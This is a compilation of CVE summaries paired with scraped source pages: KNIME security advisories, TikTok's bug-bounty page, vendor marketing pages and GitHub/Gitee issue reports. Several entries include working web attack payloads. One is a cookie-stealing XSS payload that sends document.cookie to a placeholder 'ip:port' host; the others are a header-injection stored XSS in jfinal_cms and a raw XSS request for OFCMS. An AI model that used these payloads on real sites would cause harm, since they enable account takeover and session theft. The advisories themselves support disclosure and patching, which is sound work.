Couchbase Server before 7.1.0 has Incorrect Access Control.

CVE-2021-33504: Alerts | Couchbase

In KNIME Analytics Platform below 4.6.0, the Windows installer sets improper filesystem permissions.

This page summarizes all security advisories for KNIME Software products and services, including KNIME Analytics Platform, KNIME Server, and KNIME Hub.

Please note that the CVSS Score is an indication of the potential _severity_ of the issue but not the _risk_. The actual risk needs to be assessed by every user individually because there may be circumstances where a high severity issue is not applicable and therefore does not pose a risk (and vice-versa).

If you want to know more about the CVSS Score, have a look at the resources provided by the Common Vulnerability Scoring System SIG.

**CVE-2022-31500 - Windows installer for KNIME Analytics Platform allows for privilege escalation**

*   Published: 2022-05-24
*   Affected Product: KNIME Analytics Platform before 4.6.0
*   Base CVSS Score: 8.2
*   Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H/E:F/RL:T/RC:X/CR:L/IR:L/AR:L/MAV:L/MAC:L/MPR:N/MUI:R/MS:C/MC:H/MI:H/MA:H

The installer for KNIME Analytics Platform on Windows before 4.6.0 makes the installation directory writeable to everyone on the system. This is useful so that the user can update or install extensions from a running KNIME Analytics Platform without having to restart the application as administrator. However, this also allows other authenticated local users on the system to (re)place malicious files in the installation e.g. replacing the uninstall program. The latter is run with administration privileges if the application is being uninstalled (by a user with administrative privileges). Starting with KNIME Analytics Platform 4.6.0 the installer will restrict write access to the installation directory to admin users. This also means that in order to update or install additional extensions, KNIME Analytics Platform must first be started with admin privileges.

Note that the KNIME Server installer for Windows, which can create a KNIME Analytics Platform installation used as an executor, is **not** affected.

**Workaround**

Existing installations can be "fixed" by restricting the permissions of the installation folder manually. If you use the self-extracting archive or the ZIP file the default permissions on Windows apply, which usually means that only the extracting user has write permissions on the installation directory. In this case update or installation of extensions is possible without starting KNIME Analytics Platform as admin user.

The vulnerability was found and reported by Łukasz Rupala & Przemysław Mazurek.

**CVE-2021-45096 - External XML Entity Injection with specially crafted workflow files**

*   Published: 2021-12-16
*   Affected Product: KNIME Analytics Platform before 4.5.0
*   Base CVSS Score: 4.3
*   Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N

KNIME Analytics Platform before 4.5.0 with resolve external entities in workflow.knime files when loading a workflow. Using a specially crafted workflow file, potentially sensitive information such as Windows network password hashes maybe leaked _to_ a remote system. It can not be used to leak information _from_ a remote system e.g. when a workflow is loaded on KNIME Server.

The vulnerability was found and reported by Dawid Czarnecki from NATO.

****CVE-2021-45097 -** Server installer does not restrict permission on auto-install.xml**

*   Published: 2021-12-16
*   Affected Product: KNIME Server before 4.12.6 and 4.13.x before 4.13.4
*   Base CVSS Score: 2.9
*   Vector: CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N

KNIME Server before 4.12.6 and 4.13.x before 4.13.4 (when installed in unattended mode) keeps the administrator's password in a file without appropriate file access controls, allowing all local users to read its content.

The vulnerability was found and reported by Dawid Czarnecki from NATO.

**CVE-2021-44725 - Directory path traversal when requesting client profiles**

*   Published: 2021-12-07
*   Affected Product: KNIME Server between 4.7.0 and below 4.11.6, 4.12.5, 4.13.4, respectively
*   Base CVSS Score: 7.5
*   Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

The server managed customizations functionality of KNIME Server starting at version 4.7.0 is vulnerable to Directory Path Traversal attacks. By manipulating variables that reference files by prepending “dot-dot-slash (../)” sequences and their variations or by using absolute file paths, it is possible to access arbitrary files and directories stored on the file system including application source code, configuration, and database. Due to the file-based architecture of KNIME Server, this vulnerability allows stealing users' data  
such as password hashes, workflows, licenses, jobs, and so on. No authentication is required to exploit this vulnerability.

The issue is fixed in KNIME Server 4.13.4, 4.12.5, and 4.11.6 which have been released today. All customers are advised to update their server's immediately.

**Workaround**

If you cannot update right away you can apply the following workaround which prevents access to client profiles for any user:

1.  Locate _<apache-tomcat>/webapps/knime/WEB-INF/web.xml_
2.  Edit the file and add the following block before the existing line <deny-uncovered-http-methods /> at the bottom of the file:
    
       ...
       <security-constraint>
          <web-resource-collection>
             <web-resource-name>Profiles
             <url-pattern>/rest/v4/profiles/contents
          </web-resource-collection>
          <auth-constraint />
       </security-constraint>
    
       <deny-uncovered-http-methods />
    </web-app>
    
3.  Restart KNIME Server.

The vulnerability was found and reported by Dawid Czarnecki from NATO.

**CVE-2021-44726 - Cross-Site-Scripting vulnerability in old WebPortal login**

*   Published: 2021-12-07
*   Affected Product: KNIME Server below 4.13.4
*   Base CVSS Score: 8.8
*   Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:L

The old KNIME WebPortal login page up to version 4.13.3 contains a DOM-based XSS vulnerability that once exploited, can be used to run any action as a victim user via malicious JavaScript. If the victim user is an administrator, it could be used to create a new administrator. To exploit the vulnerability it is required to create a specially crafted URL and convince the victim to open it. No authentication is required to exploit the vulnerability, however, authenticated users can be targeted.

The vulnerability was found and reported by Dawid Czarnecki from NATO

CVE-2022-31500: Security Advisories | KNIME

The TikTok application before 23.8.4 for Android allows account takeover. A crafted URL (unvalidated deeplink) can force the com.zhiliaoapp.musically WebView to load an arbitrary website. This may allow an attacker to leverage an attached JavaScript interface for the takeover with one click.

**Report security vulnerabilities**

****Report Security Vulnerabilities****

  
TikTok's mission is to inspire creativity and bring joy. The security and health of our platform closely tie to this mission. If things aren't working properly on TikTok, our dedicated security team is ready to respond and resolve those issues. In addition to our team of experienced security professionals and industry-leading security technologies, we rely on, and value, external input that flag technical security bugs on our platform. With that in mind, we have defined a set of policies to guide our external partners on properly reporting vulnerabilities. We welcome your input and appreciate your efforts to safeguard TikTok.

**

**Vulnerability Reporting Policy**

**

       •  For questions, concerns, or issues with your profile, please click here.  
       •  For questions, concerns, or issues with TikTok's privacy policy or fraud, please click here.  
       •  If someone is misusing your brand, contact us.

If you believe you have discovered a security bug or vulnerability on the TikTok app or website, please submit your report here. You will be redirected to the website of HackerOne, our trusted security bug bounty partner. HackerOne provides more information on submission guidelines and will allow you to submit a report.

TikTok follows a Coordinated Disclosure Policy. Please refer to the **Disclosure and Confidentiality Policy** defined in TikTok HackerOne Policy for more details.

**

**Guidelines**

**

  
Please visit the **Program Rules and Guidelines** section in TikTok HackerOne Policy for details.

**

**Frequently Asked Questions (FAQ)**

**

**What type of issues are considered security vulnerabilities and should be reported?**

Issues regarding technical security bugs affecting TikTok should be reported here. Issues include, but are not limited to the following:  
       •  XSS, CSRF, SSRF , SQL Injection, ROP, JOP, etc.       •  Leaked or hard coded sensitive credentials       •  Exploitable and dangerous APIs.  
       •  Control flow hijacking attacks  
       •  User data leaks  
       •  Issues listed in the OWASP Top Ten for Web Apps  
       •  Issues listed in the OWASP Top Ten for Mobile Apps  
       •  Authentication or authorization vulnerabilities  
       •  Access to internal TikTok resources like backend source code, database, etc.  
       •  Open redirect - if an additional security impact can be demonstrated  
       •  Anti-Automation security bypasses or lack of rate limiting on authenticated endpoints  
       •  Using the TikTok application for privilege escalation to attack the mobile operating system  
       •  Arbitrary code execution on TikTok servers/clients

**Is there a reward, bounty or CVE for confirmed vulnerabilities?**

Please visit **Rewards** & **Not Eligible for Reward** sections in TikTok HackerOne Policy for more details about bounty.

**How much time is needed before I can publish my findings?**

We request that security researchers follow the **Disclosure and Confidentiality Policy** defined in TikTok HackerOne Policy.

**Which web domains are within scope for TikTok?**

Please visit **In Scope** section in TikTok HackerOne Policy for details.

**How can I be notified that a security issue I've reported is being investigated?**

The security issues reported will be evaluated based on criticality and business priority and go through our investigation triage pipeline accordingly. We will keep you informed of the progress of the case to the best of our ability.

**Was this helpful?**

**Helpful links**

Creating an account

Setting up your profile

Creating a TikTok Video

CVE-2022-28799: Report security vulnerabilities | TikTok Help Center

Missing input validation in internal/db/repo_editor.go in Gogs before 0.12.8 allows an attacker to execute code remotely. An unprivileged attacker (registered user) can overwrite the Git configuration in his repository. This leads to Remote Command Execution, because that configuration can contain an option such as sshCommand, which is executed when a master branch is a remote branch (using an ssh:// URI). The remote branch can also be configured by editing the Git configuration file. One can create a new file in a new repository, using the GUI, with "\" as its name, and then rename this file to .git/config with the custom configuration content (and then save it).

CVE-2021-32546: Releases · gogs/gogs

Black Rainbow NIMBUS before 3.7.0 allows stored Cross-site Scripting (XSS).

*   Case Management
*   Orchestration & Automation
*   Quality Management System
*   Investigation Management
*   Phaneros Portal
*   Forensic Lab Management
*   Crime Scene Investigation
*   Resource (People, Process, Technology, Time, Data) Management
*   Nimbus Cloud & Saas
*   Nimbus Intelligence
*   Incident Response Lifecycle Management
*   Resource Library
*   Support
*   Contact

Skip to content

*   Government
*   Military
*   Corporate
*   Law enforcement

**COMPLEX OPERATIONS PLATFORM**

**VISUAL ANALYTICS**

**INVESTIGATION MANAGEMENT**

**On Prem - Cloud - SaaS**

**MODULAR DESIGN**

Corporate

**NIMBUS**

**Investigation Control**

NIMBUS provides total control and oversight to any investigation allowing USERS, PROCESS & TECHNOLOGY to seamlessly work together within the connected fabric of the COMPLEX OPERATIONS PLATFORM.

Explore the core NIMBUS modules.

**Investigation Management**

**Organised & Complex Investigation Lifecycle Platform**

Streamline complex Investigations by harnessing the Governance, Case Management, Quality Management, Orchestration and combine them with full disclosure management, Document Review and mark up, Actions management, Case analytics, Configurable Dashboards and management reporting to unravel any complexity in the  investigation along with full disclosure review and Digital Case file production.

**Investigation Management**

**Packed with features including:**

**Case Management**

**Digital & Traditional case management**

Solving everyday case management problems surrounding integrity, efficiency, evidence tracking, asset management, full management reporting and by combing solutions into a simple and intuitive user experience seamlessly integrating with all NIMBUS modules.

**Case Management**

**Packed with features including:**

**Orchestration & Automation**

**Orchestration & Automation Platform**

Visually digitise standard operating procedures, lab workflows or any playbook with ease allowing integration with forensic technologies, digital or traditional or external data sources. Orchestrate multiple automations, queue, prioritise, status controlled, workflow within workflow fully audited and reportable.

**Orchestration & Automation**

**Packed with features including:**

**NIMBUS Cloud & SaaS**

**Instant and flexible deployment**

Leverage the power, resilience, and speed of deployment of NIMBUS in the cloud environment of your choice as a true SaaS offering. Managed by an industry leading service delivery model, BlackRainbow removes the risk and complication of an on premise installation whilst delivering full functionality in an accelerated way.

**NIMBUS Cloud & SaaS**

**Packed with features including:**

**NIMBUS Incident Response Lifecycle Management Platform**

**Total Security Operations Management**

BlackRainbow’s incident response lifecycle management platform accelerates the incident response lifecycle, it is the connecting fabric for security infrastructure and teams. It offers entire incident management, intelligent automation and orchestration and interactive investigation. The platform has a focus on customisability and collaboration. This solution is available as a SaaS cloud-based solution, or it can be deployed on premise.

**NIMBUS Incident Response Lifecycle Management Platform**

**Packed with features including:**

**Would you like to see NIMBUS in action ?**

**PHANEROS Portal**

**Forensic requests submitted from anywhere on any platform**

PHANEROS the NIMBUS submission portal is an advanced configurable two-way electronic mobile submission management and production system for compiling, publishing, importing, and reviewing forensic case submissions. Remote users can add a case, build submissions to NIMBUS Core for authorisation, enter evidence, notes, and scene information with an on or offline capability with no need for a heavy local application install.

**PHANEROS Portal**

**Packed with features including:**

**NIMBUS Intelligence Management**

**Intelligence when you need it**

NIMBUS intelligence management and orchestration allows the ability to instigate, integrate or ‘reach out’ to the relevant intelligence resource needed for that stage of the investigation. It may be that OSINT, Dark web, local digital media seizure, external threat feeds, case metadata or external database information is needed to assist with the next stage of the investigation, NIMBUS manages the flow, automates workflow and notifications on watchlists and aggregates all of the intelligence in an authorised and auditable way.

**NIMBUS Investigation Management**

**Packed with features including:**

**Quality Management System**

**Integrated Quality Management System**

QMS aligns all the necessary areas to drive accreditation to any ISO standard or equivalent international standard. Manage and control your business performance, data and risks using our integrated quality management modules, non-conformance, actions, assets and more. When combined with NIMBUS CM it accelerates and governs the ability to obtain and maintain ISO accreditation, whilst removing administrative burdens associated to siloed systems.

**Quality Management System**

**Packed with features including:**

**Resource Library**

**Watch, read, and listen up**

All the latest videos, papers, articles, datasheets and updates from BlackRainbow

**BlackRainbow**

**Follow us**

Page load link

This website uses cookies for security and usage monitoring. You can accept or reject cookies or see the details and control which cookies are set using the buttons.

**Privacy Overview**

This website uses cookies to improve your experience while you navigate through the website. Out of these, the cookies that are categorized as necessary are stored on your browser as they are essential for the working of basic functionalities of the website. We also use third-party cookies that help us analyse and understand how you use this website. These cookies will be stored in your browser only with your consent. You also have the option to opt-out of these cookies. But opting out of some of these cookies may affect your browsing experience.

Necessary cookies are absolutely essential for the website to function properly. These cookies ensure basic functionalities and security features of the website, anonymously.

Cookie

Duration

Description

cookielawinfo-checbox-analytics

1 year

This cookie is set by GDPR Cookie Consent plugin. The cookie is used to store the user consent for the cookies in the category "Analytics".

cookielawinfo-checkbox-necessary

1 year

This cookie is set by GDPR Cookie Consent plugin. The cookies is used to store the user consent for the cookies in the category "Necessary".

viewed\_cookie\_policy

1 year

The cookie is set by the GDPR Cookie Consent plugin and is used to store whether or not user has consented to the use of cookies. It does not store any personal data.

Analytical cookies are used to understand how visitors interact with the website. These cookies help provide information on metrics the number of visitors, bounce rate, traffic source, etc.

Cookie

Duration

Description

\_ga

2 years

This cookie is installed by Google Analytics. The cookie is used to calculate visitor, session, campaign data and keep track of site usage for the site's analytics report. The cookies store information anonymously and assign a randomly generated number to identify unique visitors.

\_gat\_gtag\_UA\_109233946\_1

1 minute

This cookie is installed by Google Analytics. The cookie is used to calculate visitor, session, campaign data and keep track of site usage for the site's analytics report. The cookies store information anonymously and assign a randomly generated number to identify unique visitors.

\_gid

1 day

This cookie is installed by Google Analytics. The cookie is used to store information of how visitors use a website and helps in creating an analytics report of how the website is doing. The data collected including the number visitors, the source where they have come from, and the pages visted in an anonymous form.

Powered by

CVE-2022-24967: Corporate – BlackRainbow

A cross-site scripting (XSS) vulnerability in ICT Protege GX/WX v2.08 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter.

**Unified Access Control and Intrusion Solutions**

Whether you’re a small business needing a scalable solution or a large corporate enterprise project with thousands of doors and complex user requirements, a Protege system provides a comprehensive and flexible solution that meets the evolving needs of today's users.

**For small to medium businesses**

With no software to install, Protege WX is simple to deploy while the web-based interface means you can configure, control, and monitor your system from anywhere.

Learn more about Protege WX

**For large, enterprise organizations**

With a feature set that is easy to operate, simple to integrate, and effortless to extend, Protege GX offers a comprehensive solution that provides true benefits to any organization.

Learn more about Protege GX

**Trusted by Global Brands**

With thousands of systems installed for customers worldwide, we protect people, property, and information across a wide range of verticals.

**Where to from here?**

Our team is always here to help. Whether it's questions on installing software, advice on how to wire a card reader, or information on buying ICT products, we'd be happy to hear from you.

CVE-2022-29734: ICT | Unified access control and intruder detection

A cross-site scripting (XSS) vulnerability in /omps/seller of Online Market Place Site v1.0 allows attackers to execute arbitrary web cripts or HTML via a crafted payload injected into the Page parameter.

**Exploit Title: Online Market Place Site v1.0 - XSS and CSRF****Date: April 17, 2022****Vendor Homepage: https://www.sourcecodester.com/php/15273/online-market-place-site-phpoop-free-source-code.html****Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/omps.zip****Tested on: Parrot Linux, Apache, Mysql****Vendor: oretnom23****Version: v1.0****Exploit Description:****Online Market Place v1.0 suffers from Cross Site Scripting and Cross Site Request Forgery Vulnerability that allowing attackers to steal the cookies of other users(possible account takeover).**

\---------------------------------------- To Exploit ---------------------------------------------------------

Step 1: Register and login as a seller.

Step 2: Goto product page click action and select view product, you can see url like http://localhost/omps/seller/?page=products/view\_details&id=4

Step 3: The page parameter is the vulnerable to cross site scripting because it's not sanitizing the user input.

step 4: put the payload  and you will see the pop window that reflects 1337.

step 5: Now attacker can send malicious url to other user then perfom csrf and finally takeover their account.

For stealing the cookies : <img src='x' onerror=this.src=http://ip:port/?'+document.cookie;>

Final Payload : http://localhost/omps/seller/?page=<img src='x' onerror=this.src=http://ip:port/?'+document.cookie;>&id=4

CVE-2022-29628: OpenSource/exploit_rxss.md at main · nsparker1337/OpenSource

A cross-site scripting (XSS) vulnerability in Jfinal CMS v5.1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted X-Forwarded-For request.

There is a storage XSS vulnerability in the guest TOP10 of jfinal\_cms. TOP10 will display the ip of the user, but it can be modified by X-Forwarded-For, where the attacker can insert malicious XSS code. When the administrator logs in, the malicious XSS code triggers successfully.

payload: X-Forwarded-For: 192.168.1.1<script>alert ("xss")</script>

In the background login interface, enter the account password randomly, fill in the correct verification code, and then submit and grab the package.  

The contents of the grab bag are as follows:  

Add an X-Forwarded-For here and enter paylaod (192.168.1.1<script>alert ("xss")</script>)  

Then log in with the background administrator account to trigger the storage XSS.  

Safety advice:  
Strictly filter the user's input  
Strict control of page rendering content

CVE-2022-29648: There is an xss vulnerability of HTTP header injection storage in jfinal_cms V5.1.0 · Issue #34 · jflyfox/jfinal_cms

OFCMS v1.1.4 was discovered to contain a cross-site scripting (XSS) vulnerability via the component /admin/comn/service/update.json.

\[Suggested description\]  
There are many cross-site scripting vulnerabilities in the background of OFCMS system version 1.1.4, because the special characters entered are not effectively escaped.

\[Vulnerability Type\]  
Cross Site Scripting (XSS)

\[Vendor of Product\]  
https://gitee.com/oufu/ofcms

\[Affected Product Code Base\]  
v1.1.4

\[Affected Component\]

    POST /ofcms/admin/comn/service/update.json?sqlid=system.role.update HTTP/1.1
    Host: localhost:7000
    Content-Length: 94
    sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92"
    Accept: application/json, text/javascript, */*; q=0.01
    X-Requested-With: XMLHttpRequest
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://localhost:7000
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: http://localhost:7000/ofcms/admin/f.html?p=system/role/edit.html&role_id=3&_fsUuid=820e45c9-7f52-4e8d-b917-930c4b13153c
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: JSESSIONID=A81B589572EF210191B7C30F017A814D
    Connection: close
    
    role_id=3&role_name=%24%7B2*2%7D&role_desc=Test+freemarker+%3Cscript%3Ealert(1)%3C%2Fscript%3E
    

\[Attack Type\]  
Remote

\[Impact Code execution\]  
true

\[Vulnerability to prove\]  
Case 1:  
/ofcms/admin/comn/service/update.json?sqlid=system.menu.update  
  
  

Case 2:  
/ofcms/admin/comn/service/update.json?sqlid=cms.bbs.update  
  
  

Case 3:  
/ofcms/admin/comn/service/update.json?sqlid=cms.ad.update

CVE-2022-29653: There are many cross-site scripting vulnerabilities in ofCMS system background · Issue #I53COA · 欧福/ofcms - Gitee.com

LibreNMS v22.3.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the component /Table/GraylogController.php.

Reported by  
● Darek Jensen  
● haxmeadroom

**Please note**

> Please read this information carefully. You can run ./lnms dev:check to check your code before submitting.

*   Have you followed our code guidelines?
*   If my Pull Request does some changes/fixes/enhancements in the WebUI, I have inserted a screenshot of it.
*   If my Pull Request makes discovery/polling/yaml changes, I have added/updated test data.

**Testers**

If you would like to test this pull request then please run: ./scripts/github-apply <pr_id>, i.e ./scripts/github-apply 5926  
After you are done testing, you can remove the changes with ./scripts/github-remove. If there are schema changes, you can ask on discord how to revert.

Tag

#xss